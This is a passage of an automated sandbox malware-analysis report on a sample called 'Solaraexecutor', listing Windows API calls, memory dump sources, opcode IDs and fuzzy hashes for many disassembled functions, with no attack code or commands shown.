                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocAllocate_free
                                                      • String ID:
                                                      • API String ID: 2447670028-0
                                                      • Opcode ID: 1ae78bb7ab9f1e963a7c5b267b49a44237fcce769295d187a8cda5dfbadc4acf
                                                      • Instruction ID: 5d617f802adffb2d2307da8f28a93b196d49d8d9115dc7c7e47e92d7e44fe769
                                                      • Opcode Fuzzy Hash: 1ae78bb7ab9f1e963a7c5b267b49a44237fcce769295d187a8cda5dfbadc4acf
                                                      • Instruction Fuzzy Hash: 84F096326012156BDB212A669C05B6F7758CF81BF0F6C4136F868A7191DF72DD00B5B0
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 00D310AB
                                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 00D310B2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Process$AffinityCurrentMask
                                                      • String ID:
                                                      • API String ID: 1231390398-0
                                                      • Opcode ID: 7c02060d89eeb41c4e3f89cd820e839d59a0e935064d4ec29735140c1bdcb0e5
                                                      • Instruction ID: f6b4da4ef6aed4ba738170d90805d1bc73b0a857881b1ba6900a71ec1a6c6ad0
                                                      • Opcode Fuzzy Hash: 7c02060d89eeb41c4e3f89cd820e839d59a0e935064d4ec29735140c1bdcb0e5
                                                      • Instruction Fuzzy Hash: FBE0D836B0034AA7CF0D8BB89C058EB73DDEA44345B148175E803E7241F970DE414A70
                                                      APIs
                                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D2A325,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A501
                                                        • Part of subcall function 00D2BB03: _wcslen.LIBCMT ref: 00D2BB27
                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D2A325,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A532
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile$_wcslen
                                                      • String ID:
                                                      • API String ID: 2673547680-0
                                                      • Opcode ID: d5b60f433a284cd3d41ecf76052b83111a648a7a6806c1e73a4db066740f0601
                                                      • Instruction ID: 92e430b07ecd354c8e829db3999be467a38c8ec35f2ae4bf23d32893b92a4f97
                                                      • Opcode Fuzzy Hash: d5b60f433a284cd3d41ecf76052b83111a648a7a6806c1e73a4db066740f0601
                                                      • Instruction Fuzzy Hash: 14F03932240319BBDF025F64EC45FDA376CEB1438AF488461BD49D62A0DB71DA98EA70
                                                      APIs
                                                      • DeleteFileW.KERNELBASE(000000FF,?,?,00D2977F,?,?,00D295CF,?,?,?,?,?,00D52641,000000FF), ref: 00D2A1F1
                                                        • Part of subcall function 00D2BB03: _wcslen.LIBCMT ref: 00D2BB27
                                                      • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00D2977F,?,?,00D295CF,?,?,?,?,?,00D52641), ref: 00D2A21F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: DeleteFile$_wcslen
                                                      • String ID:
                                                      • API String ID: 2643169976-0
                                                      • Opcode ID: de8ba115f2665df7c6946a99fd588bd8a197c8ad1cf01fac9ac6847a94092147
                                                      • Instruction ID: 2d32e2788bf4e1b03d0f993195779dc79924165c1ddf72c1f7ce6c052f7e8dcc
                                                      • Opcode Fuzzy Hash: de8ba115f2665df7c6946a99fd588bd8a197c8ad1cf01fac9ac6847a94092147
                                                      • Instruction Fuzzy Hash: 65E09231140319ABEB015F64EC45FD9375CEF183C6F484021B944D2190EB61DE84DA74
                                                      APIs
                                                      • GdiplusShutdown.GDIPLUS(?,?,?,?,00D52641,000000FF), ref: 00D3ACB0
                                                      • CoUninitialize.COMBASE(?,?,?,?,00D52641,000000FF), ref: 00D3ACB5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: GdiplusShutdownUninitialize
                                                      • String ID:
                                                      • API String ID: 3856339756-0
                                                      • Opcode ID: 5931a90795a7aa7491bf280d69670956ac527c254f6a656a5fb2ccfb2766f86d
                                                      • Instruction ID: 9475a23834346140de040fa6c30aad97558ca2691c4929809d7c7208bf0214b1
                                                      • Opcode Fuzzy Hash: 5931a90795a7aa7491bf280d69670956ac527c254f6a656a5fb2ccfb2766f86d
                                                      • Instruction Fuzzy Hash: D8E03072544750EFCA019B59DC46B45FBA9FB48B20F004265E416D37A0CB746800CAA4
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00D2A23A,?,00D2755C,?,?,?,?), ref: 00D2A254
                                                        • Part of subcall function 00D2BB03: _wcslen.LIBCMT ref: 00D2BB27
                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00D2A23A,?,00D2755C,?,?,?,?), ref: 00D2A280
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile$_wcslen
                                                      • String ID:
                                                      • API String ID: 2673547680-0
                                                      • Opcode ID: 9461ae1d50f976f051efa9f2265f30a291880044b5167e1d52eb380fbd6d2a66
                                                      • Instruction ID: 7910d94885c31608d0cb556fd811f8285ca5697612f81c0c151bb8971dd66652
                                                      • Opcode Fuzzy Hash: 9461ae1d50f976f051efa9f2265f30a291880044b5167e1d52eb380fbd6d2a66
                                                      • Instruction Fuzzy Hash: 19E06D315003249BCB10AB68DC05BD97758EB183E6F044261BD44E72D0D6709E448AB0
                                                      APIs
                                                      • _swprintf.LIBCMT ref: 00D3DEEC
                                                        • Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5
                                                      • SetDlgItemTextW.USER32(00000065,?), ref: 00D3DF03
                                                        • Part of subcall function 00D3B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D3B579
                                                        • Part of subcall function 00D3B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3B58A
                                                        • Part of subcall function 00D3B568: IsDialogMessageW.USER32(00010424,?), ref: 00D3B59E
                                                        • Part of subcall function 00D3B568: TranslateMessage.USER32(?), ref: 00D3B5AC
                                                        • Part of subcall function 00D3B568: DispatchMessageW.USER32(?), ref: 00D3B5B6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                      • String ID:
                                                      • API String ID: 2718869927-0
                                                      • Opcode ID: 97544f3baf03787110b0fcc1d00e1ba5abe797b3cd19de18748dd509feb4f643
                                                      • Instruction ID: 6aad7352dbb2f68b50fa36c38b6b22982ca36e70e76bcd99f39adb00e555fda5
                                                      • Opcode Fuzzy Hash: 97544f3baf03787110b0fcc1d00e1ba5abe797b3cd19de18748dd509feb4f643
                                                      • Instruction Fuzzy Hash: 95E092B24143582ADF02AB61DC0AF9E3B6D9B15B89F040851B604DA1E2DA78EA509771
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D30836
                                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D2F2D8,Crypt32.dll,00000000,00D2F35C,?,?,00D2F33E,?,?,?), ref: 00D30858
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: DirectoryLibraryLoadSystem
                                                      • String ID:
                                                      • API String ID: 1175261203-0
                                                      • Opcode ID: b9af5dc14602982fd0ce989380d1f2e209173fa9ead9f79a9288738695c8d558
                                                      • Instruction ID: fa48ac422414dab68a9dd70e322540560315600bc04d0d3b64e90a89e51e0db0
                                                      • Opcode Fuzzy Hash: b9af5dc14602982fd0ce989380d1f2e209173fa9ead9f79a9288738695c8d558
                                                      • Instruction Fuzzy Hash: 5BE048764003686BDB11AB95DC05FDA7BACEF093D2F040065BA45D2184D674DA84CBF0
                                                      APIs
                                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D3A3DA
                                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D3A3E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: BitmapCreateFromGdipStream
                                                      • String ID:
                                                      • API String ID: 1918208029-0
                                                      • Opcode ID: 145a8c1a502d525577aec8641f373befc9f48831ee1a909049901d41471cfc62
                                                      • Instruction ID: 7761cd4ed7c7498065540b3c5f863abf758a8955580d08efc9724d2358142c67
                                                      • Opcode Fuzzy Hash: 145a8c1a502d525577aec8641f373befc9f48831ee1a909049901d41471cfc62
                                                      • Instruction Fuzzy Hash: 27E0ED72500218EBCB10DF99C541B99BBE8EB04365F14805AA89693241E374AE44DBB1
                                                      APIs
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D42BAA
                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D42BB5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                      • String ID:
                                                      • API String ID: 1660781231-0
                                                      • Opcode ID: f439cef7477da911c197a75ef5d358eec7ad367489dfb0ee888278b20a0d5953
                                                      • Instruction ID: d57e3205d02eeb73b5c3f66c82776ef59ca9aaa8fbafae3d4da5929af0c13a71
                                                      • Opcode Fuzzy Hash: f439cef7477da911c197a75ef5d358eec7ad367489dfb0ee888278b20a0d5953
                                                      • Instruction Fuzzy Hash: F9D022345A43001F8C183E783D0347A3B86EE41B757F0029AF830C6DC9EF10C048A131
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ItemShowWindow
                                                      • String ID:
                                                      • API String ID: 3351165006-0
                                                      • Opcode ID: 077cbeaa0301bd18a1901e0341ad85e3f2d314488934bcaa60b817415a3bb460
                                                      • Instruction ID: e1a7e610d25f094ac2d866ed81a119ea1aac0e73c17c6d72c1729a1331973eeb
                                                      • Opcode Fuzzy Hash: 077cbeaa0301bd18a1901e0341ad85e3f2d314488934bcaa60b817415a3bb460
                                                      • Instruction Fuzzy Hash: 01C0123206C300BECB010BB4DC0DC2BBBA8ABA5B12F04C908B0A9C0260E238C120DB21
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID:
                                                      • API String ID: 3519838083-0
                                                      • Opcode ID: de7761cf64180ef076447ac9fade7e6a84ff5db8e746b367585045a99487f9e8
                                                      • Instruction ID: 8bf53bd127388c4680b35320e307184826607f38033dfc72e89f464783e86b26
                                                      • Opcode Fuzzy Hash: de7761cf64180ef076447ac9fade7e6a84ff5db8e746b367585045a99487f9e8
                                                      • Instruction Fuzzy Hash: C8C1C338A002649FEF15CF68D494BA97BA5EF36318F0881B9EC45DB382DB309944CB71
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID:
                                                      • API String ID: 3519838083-0
                                                      • Opcode ID: e8d63c2c09ae9683bfb7e8cdfac9927837e176eeed053139b9dadf2c0bff814e
                                                      • Instruction ID: e2d0db9a15f1564ab4d4de66c17ae24d0de7e2e4a7c7d6383015a52b463a639f
                                                      • Opcode Fuzzy Hash: e8d63c2c09ae9683bfb7e8cdfac9927837e176eeed053139b9dadf2c0bff814e
                                                      • Instruction Fuzzy Hash: 5C71EF71500B949ECB35DB70D8419E7B7E9EF24304F44092EF2AB83242DA366A88DF31
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00D28289
                                                        • Part of subcall function 00D213DC: __EH_prolog.LIBCMT ref: 00D213E1
                                                        • Part of subcall function 00D2A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D2A598
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: H_prolog$CloseFind
                                                      • String ID:
                                                      • API String ID: 2506663941-0
                                                      • Opcode ID: 9b5918c7ff1f3c4adde4ecdee9fb3fc43f9cd4b2f3b296a56ec8de5ed9222ae9
                                                      • Instruction ID: 8ad04b142a010b9d8ce1203c146f25edeff908daf99d48aefc450d1b93aeb66f
                                                      • Opcode Fuzzy Hash: 9b5918c7ff1f3c4adde4ecdee9fb3fc43f9cd4b2f3b296a56ec8de5ed9222ae9
                                                      • Instruction Fuzzy Hash: 7441A9719456689ADB20EB60DC55BE9B368EF20308F0844EAE08A97082EB755FC5DB70
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00D213E1
                                                        • Part of subcall function 00D25E37: __EH_prolog.LIBCMT ref: 00D25E3C
                                                        • Part of subcall function 00D2CE40: __EH_prolog.LIBCMT ref: 00D2CE45
                                                        • Part of subcall function 00D2B505: __EH_prolog.LIBCMT ref: 00D2B50A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID:
                                                      • API String ID: 3519838083-0
                                                      • Opcode ID: e94c85bd1d92546079a987d21ec4926ba8887a576a8a49a3aba47c0f23257490
                                                      • Instruction ID: 70822d5eb4c41975cf313715bcca3b6d31743092913bac8718d5bea3eaf6d9de
                                                      • Opcode Fuzzy Hash: e94c85bd1d92546079a987d21ec4926ba8887a576a8a49a3aba47c0f23257490
                                                      • Instruction Fuzzy Hash: 8C4130B0905B409EE724DF798885AE6FBE5FF29314F50492ED5FE83282C7716654CB20
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00D213E1
                                                        • Part of subcall function 00D25E37: __EH_prolog.LIBCMT ref: 00D25E3C
                                                        • Part of subcall function 00D2CE40: __EH_prolog.LIBCMT ref: 00D2CE45
                                                        • Part of subcall function 00D2B505: __EH_prolog.LIBCMT ref: 00D2B50A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID:
                                                      • API String ID: 3519838083-0
                                                      • Opcode ID: 861709cf8a33bca40a6c211543edd2cc3590b14a8e7dd2017898154ca3941d39
                                                      • Instruction ID: 1248567d8531ab413e131ed08e7fa5c9161cfc41d64551c074a2a427cd1f8908
                                                      • Opcode Fuzzy Hash: 861709cf8a33bca40a6c211543edd2cc3590b14a8e7dd2017898154ca3941d39
                                                      • Instruction Fuzzy Hash: 57413DB0905B409EE724DF798885AE6FBE5FF29314F504A2ED5FE83282C7716654CB20
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00D3B098
                                                        • Part of subcall function 00D213DC: __EH_prolog.LIBCMT ref: 00D213E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID:
                                                      • API String ID: 3519838083-0
                                                      • Opcode ID: feff71b556bd4259cd5d1be698ffea5c2242dd073fa0606480434913cdb5bf26
                                                      • Instruction ID: 36dc5cb680ceff9a608ab9d3509599170a739dd0ac3e67d2efff5ecb703a3b7e
